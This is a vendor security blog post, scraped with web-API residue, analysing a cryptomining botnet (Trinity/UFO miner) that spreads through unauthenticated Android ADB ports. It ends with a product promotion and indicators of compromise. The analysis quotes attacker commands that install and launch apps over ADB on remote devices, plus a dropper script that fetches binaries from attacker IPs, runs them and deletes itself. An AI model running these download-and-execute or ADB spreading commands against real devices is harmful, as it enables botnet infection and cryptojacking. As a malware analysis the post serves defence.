![\"\"](\"https:\/\/blogs_admin.quickheal.com\/wp-content\/uploads\/2019\/07\/ADB-attacks-300x112.jpg\")
<\/p>\nIn the 21st century, life is becoming smart and evolving at a fast pace. Even day to day gadgets are becoming smarter. All these IoT devices are powered by ARM-based processor and run on android and unix operating system. These IoT devices include mobiles, smart T.V., routers, IP cameras and DVR. This is one major reason for cyber criminals to shift their attention towards IoT devices, which is also a trend that has been observed in the statistic of attacks on Quick Heals\u2019 honeypot.<\/p>\n
<\/p>\n
Fig. 1 Attacker locations on our honeypot<\/p>\n
Internet of things ensures continuous internet connection, which makes these devices publicly visible on the internet. Many smart TV manufactures sell smart TV\u2019s with uncertified version of android with adb port open. Even on android smartphone this port is kept open by default by some manufacturers. In addition, many a times users make debugging enabled for sideloading apps like Netflix and Hotstar on these smart TV\u2019s and mobile phones. This port requires no authentication to target any device. Using this port, attacker can take complete access of android device including its webcam, app installation etc.<\/p>\n
Quick Heal has found three most trending types of attacks on IoT devices :
\n1.DNS related attacks on routers
\n2.Peer to peer android miners
\n3.Mirai botnet.<\/p>\n
These attacks result in high processor consumption, which results in crashing these IoT devices, which in turn get used as a bot to target other devices from LAN and WAN.<\/p>\n
![\"\"](\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2019\/07\/shodan.png\")
<\/p>\n
Fig. 2 Oneplus 5 with ADB port open on public IP address<\/p>\n
Your Android devices can get attacked in three ways from the internet even without user\u2019s interaction:
\n1.Attack on static public IP
\n2.Attack within WAN
\n3.Attack within LAN<\/p>\n
<\/p>\n
![\"\"](\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2019\/07\/attack_via_public_ip-520x390.png\")
<\/p>\n
Fig. 3 Attacker attacking Android devices with public IP<\/p>\n
![\"\"](\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2019\/07\/iot_complete-520x390.png\")
<\/p>\n
Fig. 4 Infected device attacking Android devices with public IP<\/p>\n
Attack Scenario:<\/strong> Analysis of Trinity Botnet:<\/strong><\/p>\n <\/p>\n Fig. 5 Malware commands executed for p2p<\/p>\n Quick heal researcher has observed trinity miner which targeted our honeypot thrice a day by different IP’s. This miner has unique features; it uses ADB as the entrance to the system and executes miner and then scans devices connected in a network. iRunningStatus = fun_CheckIfProcessIsInExecution( Within “fun_CheckIfProcessIsInExecution<\/strong>” it executes “ps grep packagename<\/strong>” command, if ufo miner is not in running state then it installs ufo.apk and trinity. To execute miner it uses<\/p>\n adb -s i.p:5555 shell \\”am start -n packagename\\<\/strong><\/p>\n for installation of package using ADB it executes Once the device is infected by ufo miner and trinity, it starts checking devices connected in a network. Once device with ADB port found, it checks if it’s already infected or not. If it’s infected, then it pushes all files to a given device and executes all commands. In fact, they don’t even need any authentication for this type of attack. Fig. 6 Attacker’s command execution on our honeypot<\/p>\n Use of Genuine tools:<\/strong> cd \/data\/local\/tmp\/putin\/ && busybox wget https:\/\/195.29.176.138\/adb\/update.sh && chmod 777 update.sh && sh update.sh<\/p>\n for i in $n It’s easy to evade detection in this way, as links can change frequently. They drop various malware frequently by executing shell scripts like Mirai, spyware, etc.<\/p>\n Quick Heal Home Security (QHHS) -><\/strong> Fig. 7 Home after HNS security<\/p>\n It provides complete security for all the IoT devices. It also protects against DNS attack using DNS-sec feature, which is pretty much common nowadays. It also contains signature for Mirai and android malware. IOC:<\/strong> Attacker IP\u2019s:<\/strong> Detections:<\/strong> Subject Matter Expert:<\/strong> In the 21st century, life is becoming smart and evolving at a fast pace. Even day to day gadgets are becoming smarter. All these IoT devices are powered by ARM-based processor and run on android and unix operating system. These IoT devices include mobiles, smart T.V., routers, IP cameras and DVR. This is one major […]<\/p>\n","protected":false},"author":57,"featured_media":87941,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,1668,24],"tags":[431,1617,49,1534,1670],"class_list":["post-87890","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-android","category-home-security","category-malware","tag-android","tag-iot","tag-malware","tag-miner","tag-trinity"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87890"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/57"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=87890"}],"version-history":[{"count":12,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87890\/revisions"}],"predecessor-version":[{"id":87972,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/87890\/revisions\/87972"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/87941"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=87890"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=87890"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=87890"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nNormally in-home or enterprises, the internet is provided by Internet Service Providers, so we get one local IP from these ISP, so all users of one ISP are inter-connected. In general, all these users share the same public IP and different local IP by ISP. But some enterprises get dedicated static public IP address by which all their devices are directly accessible on the public internet. So, the attackers keep scanning devices whose ADB port is open on public IP from all around the world. Then this infected device infects all devices connected within the home and starts infecting devices present in neighbour\u2019s home by just using a similar mechanism as used by torrents i.e. p2p.<\/p>\n![\"\"](\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2019\/07\/adb_cmd_execution2.png\")
<\/p>\n
\nElf file contains the spreader module. This elf is targeted for ARM-based processor. This elf first checks if UFO miner and trinity is running or not.<\/p>\n
\n(int)strAttackerIp,
\n(int)”com.ufo.miner”) != 0;<\/strong><\/p>\n
\nadb -s %s:5555 install ufo.apk<\/strong><\/p>\n
\nInterestingly, the attacker is not doing anything for persistence, but as the current bot is creating multiple bots so even if this binary is stopped in the current device then other devices will execute miner again in this device. In ufo.apk miner it uses Web View exploit using which it executes mining code written in JavaScript.
\nAlso, ADB is accessible without any credential so an attacker can enter into the device at his own will and can deploy or get any file using it.<\/p>\n![\"\"](\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2019\/07\/attacker_wireshark.png\")
<\/p>\n
\nOnce device access is gained, attacker deploys shell scripts. It drops following tools into the system if not present busybox, wget, and curl, which provides extended support for executing commands. Then it executes shell script file into these devices like below.<\/p>\n#!\/system\/bin\/sh
\nn=\"arm arm7 mips mpsl x86\"
\nhttp_server=\"87.120.254.184\"<\/code><\/p>\n
\ndo
\ncp \/system\/bin\/sh $i
\n>$i
\nbusybox wget https:\/\/$http_server\/main\/$i -O -> $i
\nchmod 777 $i
\n.\/$i android.$i
\nrm -rf $i
\ndone
\nrm $0<\/p>\n
\nQuick Heal has recently launched Quick Heal Home Network Security (QHHS), a secured Wi-Fi solution to protect all your connected smart home devices from cyber-attacks. It includes firewall, URL security, IDS\/IPS engine to fight against increasing attack on home network devices. Quick Heal Home Security efficiently blocks traffic coming from public network to your smart device. It only allows traffic initiated from our product and all other traffic is blocked immediately. It also contains real-time URL blocking support and to protect against peer to peer attack for mobiles and laptops it uses IDS\/IPS engine,which contains real-time signature for Mitre attacks and the latest CVE’s.<\/p>\n![\"\"](\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2019\/07\/HNS_EDIT-550x390-550x390.jpg\")
<\/p>\n
\nAs shown in the above pic it provides isolation among guest users and trusted users which make it more secure if the already infected user also comes into our network.<\/p>\n
\n0D3C687FFC30E185B836B99BD07FA2B0D460A090626F6BBBD40A95B98EA70257
\n32B2EC59EC9D3EE46F4F73C686E94F23F36DA28F2FDF507DF0B46757A2E7FA3C
\n608EE011537005F368C9731F4C4DEE6A247B620CDE52908ED0678DF28C617971
\n63946C28EFA919809C03BE75A3937C4BE80589A9DF79CD1BE72037D493B70857
\n71ECFB7BBC015B2B192C05F726468B6F08FCC804C093C718B950E688CC414AF5
\n76AE6D577BA96B1C3A1DE8B21C32A9FAF6040F7E78D98269E0469D896C29DC64
\n7A48C93C5CB63A09505A009260D1CCA8203285E0C1C6FF5B0DF9CBB470820865
\n7A656791B445FFF02AC6E9DD1081CC265DB935476A9EE71139CB6AEF52102E2B
\nD7188B8C575367E10EA8B36EC7CCA067EF6CE6D26FFA8C74B3FAA0B14EBB8FF0<\/p>\n
\n124.117.210.89
\n206.75.56.72
\n58.152.184.34
\n61.228.232.147
\n221.127.57.204
\n168.228.25.100
\n94.244.103.90
\n181.197.0.246
\n190.140.215.96
\n93.174.93.191
\n203.218.109.29
\n111.242.69.52
\n171.240.59.88<\/p>\n
\nCoinhive.Miner.30698
\nAndroidELF.CoinMiner.C
\nAndroidELF.CoinMiner.D<\/p>\n
\nVallabh Chole<\/p>\n","protected":false},"excerpt":{"rendered":"